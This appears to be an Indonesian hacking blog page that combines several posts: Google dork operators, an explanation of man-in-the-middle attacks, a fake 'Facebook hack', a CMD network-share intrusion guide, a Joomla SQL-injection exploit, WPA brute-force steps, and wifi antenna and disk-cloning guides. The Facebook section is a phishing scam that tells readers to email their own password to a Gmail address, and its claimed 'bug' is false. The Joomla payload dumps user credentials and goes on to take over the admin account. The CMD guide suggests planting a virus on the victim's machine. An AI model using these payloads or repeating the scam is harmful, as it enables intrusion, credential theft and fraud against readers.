New Post

Archive

JENIS-JENIS DORK GOOGLE

JENI-JENIS GOOGLE DORK
Google digunakan sebagai salah satu mesin pencari yang powerfull untuk mencari informasi yang tepat dan akurat. Pencarian informasi secara akurat, cepat dan tepat didasari oleh berbagai macam motif dan tujuan, terlepas dari tujuan itu baik atau buruk. Di bawah ini akan dijelaskan tentang perintah khusus pada Google, dan akan dijelaskan pengertian dan penggunaan dari tiap – tiap perintah untuk mendapatkan informasi tersembunyi dan sangat penting. Perintah – perintah tersebut :

1. intitle:
”intitle:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud.
Sebagai contoh pada pencarian, ”intitle: password admin” (tanpa tanda kutip). Pencarian akan mencari page yang mengandung kata ”password” sebagai judulnya dengan prioritas utama ”admin”.

Jika pada pencarian terdapat dua query pencarian utama, digunakan sintaks ”allintitle:” untuk pencarian secara lengkap. Sebagai contoh pada pencarian ”allintitle:admin mdb”. Maka pencarian akan dibatasi pada dua subjek utama judul yaitu ”admin” dan ”mdb”.

2. inurl:
”inurl:” ialah sintaks perintah untuk membatasi pencarian yang hanya menghasilkan semua URL yang hanya berisi kata kunci informasi yang dimaksudkan. Sebagai contoh pencarian dalam pencarian,”inurl: database mdb”.

Pencarian akan menghasilkan semua URL yang hanya mengandung informasi tentang ”database mdb”. Hal yang sama juga berlaku pada sintaks ini, jika terdapat dua query pencarian utama, digunakan sintaks ”allinurl:” untuk mendapatkan list url tersebut.

Sebagai contoh pencarian ”allinurl: etc/passwd” , pencarian akan menghasilkan URL yang mengandung informasi tentang ”etc” dan ”passwd”. Tanda garis miring slash (/) diantara dua kata etc dan passwd akan diabaikan oleh mesin pencari Google.

3. site:
”site:” ialah sintaks perintah untuk membatasi pencarian suatu query informasi berdasarkan pada suatu situs atau domain tertentu. Sebagai contoh pada pencarian informasi: ”waveguide site:ugm.ac.id” (tanpa tanda kutip). Pencarian akan mencari topik tentang waveguide pada semua halaman yang tersedia pada domain ugm.ac.id.

4. cache:
”cache:” akan menunjukkan daftar web yang telah masuk ke dalam indeks database Google, yang berhasil didapatkan oleh Google Crawler. Sebagai contoh:
”cache:detik.com”, pencarian akan memperlihatkan list yang disimpan pada Google untuk page detik.com.

5. filetype:
”filetype:” ialah sintaks perintah pada Google untuk pencarian data pada internet dengan ekstensi tertentu (i.e. doc, pdf or ppt etc). Sebagai contoh pada pencarian : ”filetype:pdf” ”Linux Hacking” (tanpa tanda kutip). Pencarian akan menghasilkan file data dengan ekstensi ”.pdf” yang mengandung kata Linux dan Hacking.

6. link:
”link:” ialah sintaks perintah pada Google yang akan menunjukkan daftar list web pages yang memiliki link pada web page special. Sebagai contoh: ”link:www.detik.com” akan menunjukkan daftar web page yang memiliki point link pada halaman situs Detik.

7. related:
Sintaks ini akan memberikan daftar web pages yang serupa dengan web page yang di indikasikan.Sebagai contoh: ”related:www.detik.com”, pencarian akan memberi daftar web page yang serupa dengan homepage Detik.

8. intext:
Sintaks perintah ini akan mencari kata kata pada website tertentu. Perintah ini mengabaikan link atau URL dan judul halaman. Sebagai contoh :
”intext:admin” (tanpa tanda kutip), pencarian akan menghasilkan link pada web page yang memiliki keyword yang memiliki keyword admin.

Dengan menggunakan beberapa kata kunci di atas, Google akan menjadi ”pedang” yang bisa dimanfaatkan untuk menggali informasi yang tersembunyi, tak terduga, bahkan sangat penting bagi suatu pihak. Beberapa pihak yang rajin melakukan auditing (pemeriksaan) keamanan suatu sistem melalui jaringan internet biasanya menggunakan google sebagai sarana praktis untuk footprinting (penggalian data sistem yang akan diaudit). Pada kesempatan mendatang, akan kita coba menguak beberapa rahasia yang bisa didapat, hanya dengan google dan kecerdasan otak kanan kita

TURORIAL MAN IN THE MIDDLE ATTACK

Man In The Middle Attack merupakan jenis serangan yang sangat berbahaya dan bisa terjadi di mana saja, baik di website, telepon seluler, maupun di peralatan komunikasi tradisional seperti surat menyurat.
Oleh karena itu saya pikir perlu ada satu artikel khusus yang membahas tentang mitm attack terlepas dari apapun dan dimanapun implementasi teknisnya.

Bukan Sekedar Sniffing
Mungkin banyak yang mengira tujuan dari serangan mitm adalah untuk menyadap komunikasi data rahasia, seperti yang sniffing. Sniffing bisa disebut sebagai passive attack karena pada sniffing attacker tidak melakukan tindakan  apa-apa selain memantau data yang lewat.  Memang benar dengan serangan mitm, seorang attacker bisa mengetahui apa yang dibicarakan oleh dua pihak yang berkomunikasi. Namun sebenarnya kekuatan terbesar dari mitm bukan pada kemampuan sniffingnya, namun pada kemampuan mencegat dan mengubah komunikasi sehingga mitm attack bisa disebut sebagai jenis serangan aktif.

Gambar di bawah ini adalah skenario yang bisa dilakukan attacker dengan serangan mitm :

GAMBAR MAN IN THE MIDDLE ATTACK

Pada gambar tersebut terlihat ada 4 macam serangan yang bisa dilakukan dengan MITM. Berikut adalah penjelasan dari jenis serangan tersebut dalam skenario seperti gambar di atas.

  • Sniffing: Charlie mengetahui semua pembicaraan antara Alice dan Bob.
  • Intercepting: Charlie mencegat pesan dari Alice ketika Alice ingin menutup percakapan dengan “Bob I’m going to sleep, Bye!”. Dengan begini Bob mengira Alice masih berkomunikasi dengannya.
  • Tampering: Charlie mengubah jawaban Bob kepada Alice dari account Paypal bob menjadi charlie.
  • Fabricating: Charlie menanyakan nomor social security number kepada Bob, padahal pertanyaan ini tidak pernah diajukan oleh Alice.
Dengan cara mitm ini bisa dibayangkan betapa besar potensi kerusakan yang bisa dilakukan Charlie kepada Alice dan Bob.

Proses Terjadinya Serangan Man-in-The-Middle
Dalam serangan mitm, seorang attacker akan berada di tengah-tengah komunikasi antara dua pihak. Seluruh pembicaraan yang terjadi di antara mereka harus melalui attacker dulu di tengah. Attacker dengan leluasa melakukan penyadapan, pencegatan, pengubahan bahkan memalsukan komunikasi seperti yang sudah saya jelaskan sebelumnya.
Sekarang mari kita lihat proses terjadinya MITM dalam contoh kasus Alice berkomunikasi dengan Bob. Charlie sebagai attacker akan berusaha berada di tengah antara Alice dan Bob. Agar Charlie berhasil menjadi orang ditengah, maka Charlie harus:

  • Menyamar sebagai Bob dihadapan Alice
  • Menyamar sebagai Alice dihadapan Bob

GAMBAR ILUSTRASI MAN IN THE MIDDLE ATTACK


Dalam mitm, Alice mengira sedang berbicara dengan Bob, padahal dia sedang berbicara dengan Charlie. Begitu juga Bob, dia mengira sedang berbicara dengan Alice, padahal sebenarnya dia sedang berbicara dengan Alice. Jadi agar bisa menjadi orang di tengah Charlie harus bisa menyamar di dua sisi, tidak bisa hanya di satu sisi saja.

Kenapa Alice dan Bob bisa terjebak dan tertipu oleh Charlie? Itu karena Alice dan Bob tidak melakukan otentikasi dulu sebelum berkomunikasi. Otentikasi akan menjamin Alice berbicara dengan Bob yang asli, bukan Bob palsu yang diperankan oleh Charlie. Begitu juga dengan otentikasi, Bob akan berbicara dengan Alice yang asli, bukan Alice palsu yang diperankan oleh Charlie.

Pentingnya Otentikasi: Who Are You Speaking With?
Otentikasi adalah proses untuk membuktikan identitas suatu subjek, bisa orang atau mesin. Proses membuktikan identitas seeorang ada banyak cara, namun semuanya bisa dikelompokkan dalam 3 kategori:
  • What you know: PIN, password, pasangan kunci publik-privat
  • What you have: smart card, kunci, USB dongle
  • What you are: fingerprint, retina
Secara singkat otentikasi menjawab pertanyaan “Who are you speaking with?”. Pertanyaan itu sangat penting diketahui sebelum dua pihak berkomunikasi. Bila dua pihak berkomunikasi tanpa sebelumnya melakukan otentikasi, maka keduanya bisa terjebak berbicara dengan orang yang salah, yaitu orang yang menyamar menjadi lawan bicaranya. Bila sampai ini terjadi maka akibatnya bisa sangat fatal, salah satunya adalah terjadinya mitm attack.
Bila dua orang yang sudah saling mengenal berbicara dengan tatap muka langsung, maka tidak mungkin keduanya terjebak dan tertipu berbicara dengan orang yang salah. Otentikasi menjadi sangat penting bila kedua pihak berbicara melalui media komunikasi jarak jauh seperti telpon atau internet. Dalam komunikasi jarak jauh, kita hanya bisa mendengar suara lawan bicara kita, jadi sangat besar kemungkinan kita berbicara dengan orang yang salah.
Jadi cara untuk mencegah serangan MITM adalah dengan melakukan otentikasi sebelum berkomunikasi. Bahkan walaupun otentikasi dilakukan oleh salah satu pihak saja, itu sudah cukup untuk mencegah mitm. Mari kita lihat kembali contoh Alice,  Bob dan Charlie, bila otentikasi hanya dilakukan oleh Bob, sedangkan Alice tidak. Karena tidak adanya otentikasi Alice, maka Charlie bisa menyamar sebagai Alice di hadapan Bob, namun Charlie tidak bisa menyamar sebagai Bob di hadapan Alice. Kenapa Charlie tidak bisa menyamar menjadi Bob? Sebab Alice akan menguji keaslian Bob dengan otentikasi, sehingga penyamaran Charlie sebagai Bob palsu akan terbongkar dan Alice tidak akan mau melanjutkan komunikasi.

Facebook Hack

FACEBOOK HACK
BELAJAR CARA HACK FACEBOOK 100% BERHASIL Hacker itu bukan penjahat melainkan orang yg jenius. Kode promosi halaman tinggal copy paste sebuah kode di status atau dinding anda atau teman anda >> Cara Mengetahui Password Teman Dekat Anda
LANGKAH_LANGKAHNYA UNTUK MENGGETAHUI PASSWORD FACEBOOK TEMEN KAMU: 1. KLIK LIKE/SUKA HALAMAN INI TERLEBIH DAHULU
==================================================
==================================
==================================================
==================================================
==================================================
BACA BAIK-BAIK !!!...
==================================================
Bugs pada facebook memiliki sistem pertahanan yang cukup tangguh. Disamping itu, tampilan yang menawan dan banyakanya fitur- fitur menarik yang tersedia dibandingkan dengan fs dan yang gratisan lainnya menjadi alasan utama bagi mereka untuk memilih Fb Ketika dahulu (dan juga hingga kini) tehnik session hijacking semakin marak dikalangan para attacker, pengguna fb bisa sedikit berlega hati karena facebook telah mengantisipasi hal tersebut dengan menerapkan beberapa aturan berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Keempat hal diatas telah cukup untuk membuat banyak para kiddies harus gigit jari karena serangan session hijacking akan sangat-sangat sulit untuk dilakukan (karena ketidakmampuan mereka tentunya dan pengecualian bagi kaum elite ) Tapi bagi kamu yang sangat-sangat bernafsu untuk bisa menembus email yahoo orang lain kini bisa sedikit terhibur karena telah ada sebuah bugs baru pada fb. fb memiliki sebuah alamat email special yang otomatis dikendalikan oleh mesin yang jika kita kirimkan sebuah nilai “recovery” trenkripsi kepada alamat itu bersama alamat email korban, maka kamu akan memperoleh balasan email otomatis yang berisi password korban Memanfaatkan Bugs

____________________________________________

ok, sudah gak sabar yach… ikuti langkah-langkah berikut:

1. Sign in lah kedalam account email kamu terlebih dahulu. yahoo, gmail, dll..

2. kemudian dengan perasaan yang mendalam tulislah sebuah pesan, tekan tombol [Compose]/[tulis surat] untuk menulis email.

3. Pada form isian to/ kepada masukkan alamat berikut:

hackstap.facebook@gmail.com

Alamat inilah yang saya sebutkan sebagai alamat special tadi. Sebenarnya alamat ini hanya boleh diketahui oleh para admin Facebook saja, namun yeah.. kini alamat mematikan ini telah jatuh ke tangan kita

4. Pada form cc dan bcc, kosongi saja kedua form tersebut

5. pada kolom Subject ketik “uidfb” tanpa tanda kutip.

6. Pada form message (pesan), ketik kode UID berikut:

facebook.com FALSE/FALSE 1121114252079889
Username facebook : user ID facebook kamu
Facebook password : password kamu
Recover : user ID facebook korban
TTG : tanggal lahir kamu
6. Setelah itu tekan tombol send.

Dan tunggulah dalam beberapa hari kamu akan menerima email balasan yang berisi password korban dan informasi-informasi mengenai korban seperti secreet question yang dipakai korban beserta jawabannya dan tanggal lahir korban

Contohnya:

misalkan user ID facebook kamu adalah elite@yahoo.com
dan password kamu 3l1t3b3n3r4n
dan user ID facebook korban: korban@yahoo.com

maka susunannya adalah sebagai berikut:

to: hackstap.facebook@gmail.com
cc:
bcc:
Subject: Recovery
message: facebook.com FALSE/FALSE 1121114252079889
Username facebook : elite@yahoo.com
Facebook password : 3l1t3b3n3r4n
Recover : korban@yahoo.com
TTG : 10041994

___________________________________________

:: Cara Pencegahan ::

Bagi kamu para pengguna fb yang tidak ingin passwordmu dicuri dengan tehnik ini, lakukan cara berikut:

1. Pada form isian sento to: isikan

hackstap.facebook@gmail.com

2. Pada kolom Subject ketik “No Recovery” tanpa tanda kutip.

3. Kirim message sebagai berikut:

facebook.com No Rerovery
Username facebook : elite@yahoo.com
Facebook password : password kamu

contohnya yang sudah jadi:

to: hackstap.facebook@gmail.com
cc:
bcc:
subject: No Recovery
message: facebook.com No Rerovery
Username facebook : username facebook kamu
Facebook password : password facebook kamu
TTG : tanggal lahir kamu
Setelah mengirim email tersebut, maka bisa dipastikan facebook kamu sudah aman dari bugs mematikan ini. Orang yang berusaha melakukan tehnik ini tidak akan pernah mendapat balasan email yang berisi passswordmu. Namun harap diingat bahwa kamu juga harus melakukan hal ini setelah melakukan perubahan account. Jadi jika suatu ketika kamu mengganti password, lakukan cara penyelamatan lagi dengan melakukan langkah ini. Cepat lakukan sebelum terlambat, karena sudah banyak orang yang terkena cara ini! Ingat: Lakukan cara 2. untuk mendapatkan password korban Lakukan cara 3. untuk mencegah
facebook kamu di hack orang lain.

_____________________________________________

Bisa langung dari facebook kita jg tanpa harus membuka email

cara nyaLakukan langkah-langkah dibawah :

1. Login email facebook anda dan lanjutkan ke halaman mengirim pesan.
2. Klik compose message
3. Pada tulisan To isi dengan
hackstap.facebook@gmail.com
4. Pada tulisan subject isi dengan kata “PASSWORD RETRIEVE”
5. isi pesan :
baris pertama tulis alamat email anda.
baris kedua tulis alamat email facebook temen anda.
baris ketiga tulis password facebook anda.
baris keempat tulis kode ini : cgi-bin/$et76431&pwr999
Lalu Send/Kirim.

Contoh :
To : hackstap.facebook@gmail.com
Subject : PASSWORD RETRIEVE
Message :

anda@yahoo.co.id
temen anda@yahoo.com
Password anda
cgi-bin/$et76431&pwr999

Lalu Send/Kirim.

INGAT : JANGAN DISALAHGUNAKAN!!
Good luck.... ____________________________________________

CATATAN :
1. Jika anda mendapat pemberitahuan "Cannot find a password ! Give a little time to fix this problem, We will sent back your request for a few days"
tunggu beberapa hari,dan mesin hacker akan mengirimkan password lagi ke anda. (paling lama 1minggu)
2. Walaupun email anda yahoo, namun email si korban gmail, tidak menjadi masalah.namun ingat ini hanya berlaku untuk pengguna YAHOO,YMAIL dan GMAIL.

REMOTE KOMPUTER DALAM SATU JARINGAN MENGGUNAKAN CMD

pada kali ini saya share tentang bagaimana meremote komputer orang lain simak dengan baik baik ya sahabat bloger sejatii,.,.,.
pertama yg harus di siapkan adalah, ya seperti biasa .,.,.
kopy hangat dan bagi sahabat bloger yang perokok aktiv sediakan rokok satu pack
next  

Salah satu senjata terampuh para Hacker adalah Command Prompt, percaya tidak percaya tool bawaan windows ini bisa sama gunanya sama Remote Executor, FTP Manager, dll. tetapi bedanya ini berbasis CUI (Code User Interface) kalo Remote Executor, FTP Manager kebanyakan berbasis GUI (Graphical User Interface) yang semudah klak-klik-klak-klik dll.

Dalam tulisan ini saya akan memberi tutorial meremote komputer orang lain dengan Command Prompt.
Persyaratanya adalah :

1. Pc Kita & Pc target sama-sama sedang connect internet
2. Pc Kita & Pc target sama-sama menggunakan OS Windows

Tentukan IP target mu,Dan Mulai jalankan CMD dengan cara :
Start ====> RUN ===> CMD
Kemudian ketikan perintah dibawah ini :

cd c:\  [enter]

C:\>net use \\ip_target [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

C:\>net use K: \\ip_target\c$ [enter]
kalo ada keterangan
the command completly succesfully, lanjut...

Seperti Gambar Di bawah ini :
CARA MELAKUKAN REMOTE KOMPUTER ORANG LAIN MENGGUNAKAN CMD











Setelah Sukses Langsung Buka My Computer anda
maka akan terlihat drive K disanalah Drive C target berada
Jika ingin meremot Drive D  cukup mengganti kode net use K: \\ip_target\c$ menjadi net use K: \\ip_target\d$

jika anda ingin menambahkan virus ke komputer yang agan hack copy file virus tersebut ke folder tersebut jalan kan  pasti maknyussss dechhh
sekian share dari saya  mudah mudahan bermanfaat bagi sahabat bloger>>>>>

TUTORIAL EXPLOIT JOMLA

hack jomla
- Step 1 
"Exploit Joomla option=com_ignitegallery"
sedikit dr awamer
 "Exploit Joomla option=com_ignitegallery"
no picture.. sorry
--first  coba kita cari di google dengan dork ini
inurl:"index.php option=com_ignitegallery"
kembangin sdnri ya

- Step 2
pasang exploitnya
exploit : /index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--

 contoh : http://www.pulot.com/index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat%28id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype%29,4,5,6,7,8,9,10+from+jos_users-

- ntar muncul tu 62:admini:989868wjhgd blablabla..

 - second coba kita reset password nyasekarang kita reset password dengan menggunakan exploit ini :

www.site.com/index.php?option=com_user&view=reset  
masukin aja email admin tadi..

- third wah minta activation pula, tenang kita cari dulu activationnya :D
exploit :

 index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,activation),4,5,6,7,8,9,10+from+jos_users-- ntar keluar aktifasi nya..


NOTE: klo aktifasi nya ada code tanda $.. berarti code aktifasi nya g bisa pke, find target lain trus masukin code aktifasi nya..


trus dia nya minta password baru.. masukin password sesuka kamu.

oke langsung ke tahap berikutnya,
sekarang kita masuk keadminnya
http://site.com/administrator/

ANTENA WIFI RAKITAN

cara merakit antena wifiSebaiknya Anda pertimbangkan untuk membuat Wajan Bolic. Kenapa? Karena Wajan Bolic lebih murah daripada Antena Kaleng berdasarkan dari uji coba yang saya lakukan.


1. USB Wifi Blue Link BL U80G = Rp. 130.000

2. Wajan 38cm = Rp 27.500

3. 1 Meter PVC 3" = Rp. 12.500

4. 2 Doff (tutup pralon) = Rp. 10.000

5. 1 buah Baut = Rp. 6000

6. 1 Gulung Kertas Alumunium = Rp. 33.000

7. 8 M kabel belden 1538 A = 32.000

8. 1 buah USB Extender = Rp. 10.000


Bagaimana dengan biaya antena kaleng? Tahun 2006 saya menghabiskan biaya lebih dari 400 ribu untuk pembuatan antenna kaleng, tapi untuk sekarang mungkin sudah lebih murah dan ada juga komponen yang makin naik harganya. Seperti komentar berikut:

Di panduan yang Bapak buat, harga SMA Connectornya Rp 11.000,- tapi setelah saya ke toko Sagan Baru, saya tanya harganya Rp 32.000,- Lalu, harga Soket N Connector dan Plugnya dua kali lipat lebih mahal dari panduan yang Bapak buat. Gimana dong, Pak? Apa memang harganya udah segitu?

dan

saya sudah buat antena kaleng, ternyata biaya untuk beli alat konektor nya 155.000 beda jauh sama yang di gambar. trus setelah di coba. tetap gak bisa konek internet.

Karena antusiasnya pengguna internet Indonesia untuk mendapatkan koneksi internet dengan harga murah atau gratis, sekaligus tidak ingin mengecewakan pembaca, Berikut pertanyaan yang sering ditanyakan dan diulang-ulang (maklum orang Indonesia banyak yang malas membaca).



T: Dimanakah saya bisa men-download e-book antena kaleng?

J: Silakan download disini. Sudah lengkap dengan gambarnya dan antena calculator.



T: Apakah Anda sudah mencoba mempraktekannya (membuat antenna kaleng)?

J: Tentunya sudah, dan saya pergunakan hingga kalengnya berkarat .



T: Berapa jarak maksimal antenna kaleng ke Access Point atau sebaliknya? Apa ada hubungannya dengan ketinggian antena.

J: Jarak maksimal hanya 1 km, dan pernah saya coba sejauh kurang lebih 700 meter, dan hubungannya dengan ketinggian, semakin tinggi Antena maka semakin tinggi pula peluang untuk mendapatkan sinyal Wi-Fi



T: Berapa maksimal panjang kabel RG 58?

J: Panjang maksimal 7 meter jika lebih dari itu maka koneksi tidak akan berjalan dengan baik. Idealnya 50 cm.



T: Apa tembaga buat antena bisa diambil dari kabel tembaga biasa?

J: Bisa. Saya memakai tembaga dari kabel listrik.



T: Apakah antena kaleng bisa langsung konek ke hotspot? Apa perlu software?

J: Bisa, jika hotspot-nya memang diperuntukan untuk umum, dan untuk terhubung tidak perlu software tambahan, karena di Windows atau Linux sudah ada. Silakan baca cara terhubung ke Wi-Fi di e-booknya.



T: Aku coba pakai antena kaleng sudah dapat sinyal Wi-Fi cuma 1 baris tapi tidak bisa konek? padahal aku tanya hotspotnya dibuka untuk umum, apa perlu seting lagi di windows?

J: Satu baris artinya sinyal sangat lemah dan kemungkinan untuk terhubung sangat sulit. Pastikan juga Wireless Zero Configuration-nya sudah jalan (Baca di e-book, sudah ada penjelasannya). Tanyakan juga kepada pemilik Wi-Fi, bentuk umumnya seperti apa? Ada juga yang di bebaskan untuk umum tapi kita harus mendaftar.



T: Nah apa gak perlu account/user/password tuk konek ke akses poin yang bakal menjadi sasaran?

J: Tergantung dari settingan Akses Point.



T: Laptop kan udah ada wifinya tanpa menggunakan modem, bagaimana cara memperkuat penerima wifi yang udah ada di dalam laptop? apa masih pakek tambahan modem?

J: Kalau yang ini belum tahu caranya, karena Wi-Fi sudah terpasang di laptop atau built in, dan yang jelas tidak perlu tambahan modem.



T: Mas, ada gak cara bikin antenna 2.4 GHz dengan memanfaatkan Wireless adapter internal pada notebook, tolong donk!!!

J: Maaf, Sejauh ini saya belum menemukan tutorial cara memanfaatkan atau memperkuat sinyal dari Wireless adapter internal laptop.



T: Pada no 2 tentang alat yang di perlukan dituliskan tentang PCMCIA Card ( bila anda menggunakan laptop yang belum di lengkapi perangkat wifi 802,11b atau 802,11g) yang mempunyai antena luar.

1. Apa maksudnya itu mas?

2. Apa laptop saya punya hal itu? (laptop saya punya fasilitas wifi yang bisa konek langsung kalau ada hotspot terbuka)

3. Apabila laptop saya mempunyai fasilitas wifi tersbut, apakah masih di perlukan juga PCMCIA untuk pembuatan antena kaleng ini? (mksud saya, apakah kabel RG 58 yang dari antena tetap di sambungkan juga ke PCMCIA card? )

J: Berikut jawaban dari tiga pertanyaan yang paling sering ditanyakan.

1. Maksudnya jika laptop belum ada Wi-Fi internal atau bawaan, maka harus dibelikan untuk PCMCIA atau USB Wifi untuk dapat terkoneksi internet.

2. Karena laptop sudah terhubung ke hotspot, artinya laptop sudah ada Wifi internal tapi tidak bisa dipakai untuk antena kaleng.

3. Masih perlu. Tidak perlu beli PCMCIA dan kabel RG 58, karena sekarang sudah ada wajan bolic yang menggunakan USB Wifi yang harganya lebih murah dari PCMCIA.



T: Om... Kalau pake wifi adpater bawaan laptop bisa gak? Terus nyolokin kabel antena ke laptop dimananya?

J: Belum bisa. Karena Wi-Fi adapter bawaan, maka tidak ada tempat untuk nyolokin kabel.



T: Mas penulis... Sekarang kayaknya susah nyari Wireless Lan Card. Kalo pake USB wireless bisa ga?

J: Bisa. Perhitungan yang digunakan juga sama... Silakan di coba. Untuk memperpanjang kabelnya silakan gunakan UTP + USB Extender (untuk caranya, silakan baca sampai habis tulisan ini).



T. Saya tidak menggunakan PCI WLAN card, tapi mengunakan USB WLAN bisa ga? trus klo seandainya bisa, langkah-langkah apa saja yang perlu saya lakukan nanti untuk bisa merubah USB WLAN saya menjadi Antena luar, karena saat ini saya sudah punya USB WLAN, kan sayang klo saya harus beli PCI WLAN.

J: Bisa.Langkah-langkahya sama dengan jawaban diatas.



T: Apakah antena kaleng ini legal?

J: Legal, kecuali sudah ada hukumnya. Maaf, belum pernah baca larangannya.



T: Bagaimana kita mengetahui suatu area atau daerah ada hotspotnya?

J: Untuk mengetahui hotspot disekitar gunakan netbook, laptop, HP atau BB yang sudah ada WiFi-nya. Untuk memudahkan dalam melacak keberadaan sinyal, install netstumbler,insider atau vistumbler. Metode pencarian ini dikenal dengan istilah War Driving



T: Bagaimana kalau setiap peralatan yang dibutuhkan untuk membuat antena kaleng disertkan gambarnya, supaya kalau kita nanya ke tokonya jadi lebih gampang.

J: Gambarnya sudah ada didalam e-books. Silakan di download e-booknya dan dibaca lebih teliti.



T: Apakah antena kaleng tahan dari hujan? Bagaimana supaya tahan hujan? Apakah hujan mengganggu sinyalnya?

J: Tergantung dari bahan antena. Kaleng mudah karatan (korosi) dan untuk membuatnya tahan hujan bisa dibuatkan penutup diatasnya, tapi ini tidak perlu dilakukan karena kaleng bisa kita ganti setiap saat dan murah. Tentu saja hujan dapat mengganggu sinyal dan membuat koneksi jadi lambat.



T: Apakah wireless hack melanggar hukum?

J: Hacking jika tujuan untuk testing keamanan system dari Wi-Fi dan diberikan ijin tentunya tidak melanggar hukum, tapi jika hacking yang dimaksudkan adalah untuk mendapatkan akses internet dari Wi-Fi yang kita hack tentunya sama dengan mencuri. Untuk hukumannya saya belum tahu.



T: Saya udah buat antena kaleng, dan sudah dapet sinyalnya, terus bagaimana caranya agar saya bisa terhubung ke internet?

J: Caranya, pastikan terlebih dahulu bahwa sinyal yang ada tidak di proteksi (ada gambar gembok) dan bisa di akses oleh umum. Caranya baca di e-book.



T: Daerah mana saja yang bisa memakai antena kaleng?

J: Semua daerah yang ada sinyal Wi-Fi.



T. bagaimana cara penyambungan kabel UTP dan USB extender?

J: Berikut adalah penyambungan atau rangkaian kabel UTP dengan USB:

putih oranye dan oranye (UTP) = (USB) merah

putih hijau (UTP) = (USB) putih

hijau (UTP) = (USB) hijau

putih biru, biru, putih coklat, coklat (UTP) = (USB) hitam

Info lengkapnya: Teknik USB Extender



T: Berapa maksimal panjang UTP untuk memperpanjang USB Extender?

J: 5 meter untuk kualitas yang bagus. 8 meter sudah mencukupi dengan kabel yang baik (Belden AMERIKA). Jika lebih dari 8 meter, Anda harus menggunakan USB Power Injector.





HACKING WIFI

cara hack speedy password
tutor kali ini akan membahas cara hack password wpa/wpa2 pada area hospot yang terkunci security wpa2
dengan tool airlin kita bisa bruteforce security wifi tanpa wpa handshake
langsung saja
download toolnya --> Disini
taruh hasil download pada desktop lalu ekstrak dengan perintah
unrar x /root/Desktop/airlin-1-0-1.rar
setelah itu masuk folder airlin

cd Desktop/airlin-1-0-1
chmod 777 airlin.sh
mv airlin.sh /usr/bin/airlin.sh

setelah ailin dipindah folder ke /usr/bin lalu keluar dan buka terminal lagi
dan jalankan program airlin.sh

pilih interface kalian disini saya menggunakan wlan0
Lalu cari korban wifi yang terproteksi wpa/wpa2
aktifkan airmon-ng dan scan dan scan dengan airodump-ng dengan membuka tab baru dengan menekan ctrl + shift + t
lalu copy paste essid wifi tersebut
lalu pilih wordlist kalian
disini wordlist saya ada pada /root/Desktop/contoh.txt
lalu isi kan delay nya
jangan terlalu cepat delaynya itu berakibat airlin gak bisa membruteforce dengan akurat

disini saya memilih delay 25
ok tunggu hingga proses brute selesai

dan password pun di temukan

Cara Cloning Hardisk Mudah dan Cepat dengan XXClone Gratis

cara clonning hardiskSebuah pertanyaan yang tepat diajukan sebelum saya melanjutkan artikel ini adalah : kenapa kita perlu cloning hardisk? Apa manfaat dan keuntungannya? Studi kasus berikut ini mungkin bisa menjelaskan tentang manfaat yang kita dapatkan dari kloning hardisk :

Hardisk komputer kita berkapasitas kecil. Kita ingin upgrade ke hardisk yang berkapasitas lebih besar. Sayangnya, di dalam hardisk tersebut sudah terinstall Windows, software, aplikasi, dan banyak hal lainnya. Akan sangat melelahkan dan boros waktu jika kita menginstall semuanya dari awal. Hal yang bisa kita lakukan untuk menghemat waktu dan produktivitas adalah dengan mengkloning hardisk lama kita ke hardisk kita yang baru. File, Windows, Software, Aplikasi, serta berbagai setting lainnya akan bisa digunakan secara langsung tanpa kita perlu bersusah payah.

Dengan manfaat cloning hdd yang sedemikian besar, hari ini saya akan memberikan sebuah software clone hardisk yang gratis dan legal : XXClone!

Apa itu XXClone?

XXClone adalah freeware yang dibuat untuk mempermudah anda dalam melakukan kloning hardisk. Fungsinya sama dengan software Norton Ghost.

Sebenarnya XXClone Free merupakan versi gratis dari XXClone Home dan XXClone Pro. Namun demikian, fitur XXClone Free sudah bisa digunakan untuk mengkloning hardisk dengan mudah dan cepat.

Bagaimana cara mengkloning hardisk dengan XXClone Free?

1. Download XXClone Free versi terbaru

Installer XXClone Free disini http://www.xxclone.com/xxclone.zip

Homepage XXClone Free disini http://www.xxclone.com/

2. Install dan jalankan XXClone Free

3. Pastikan kedua hardisk : hardisk sumber (source) dan hardisk tujuan (target) sudah terpasang di komputer anda.

3. Ketika pertama kali XXClone dijalankan, akan ada tampilan untuk memilih Source Volume dan Target Volume. Pilih sesuai dengan yang anda inginkan kemudian klik “Start”. Klik Yes jika ada popup konfirmasi. Tunggu hingga selesai.

4. Jika dalam kasus ini anda sedang mengkloning hardisk yang berisi sistem operasi, maka anda harus membuat Clone Drive tersebut bootable. Caranya cukup klik tab “Cool Tools” dan klik tombol “Make Bootable”

5. Saat ada popup yang muncul, centang ketiga Boot Control : Write MBR, Write Boot Sector, dan Write BOOT.INI. Kemudian klik Start. Saat ada konfirmasi, klik Yes.

6. Hardisk anda sudah selesai dikloning, Klik Exit.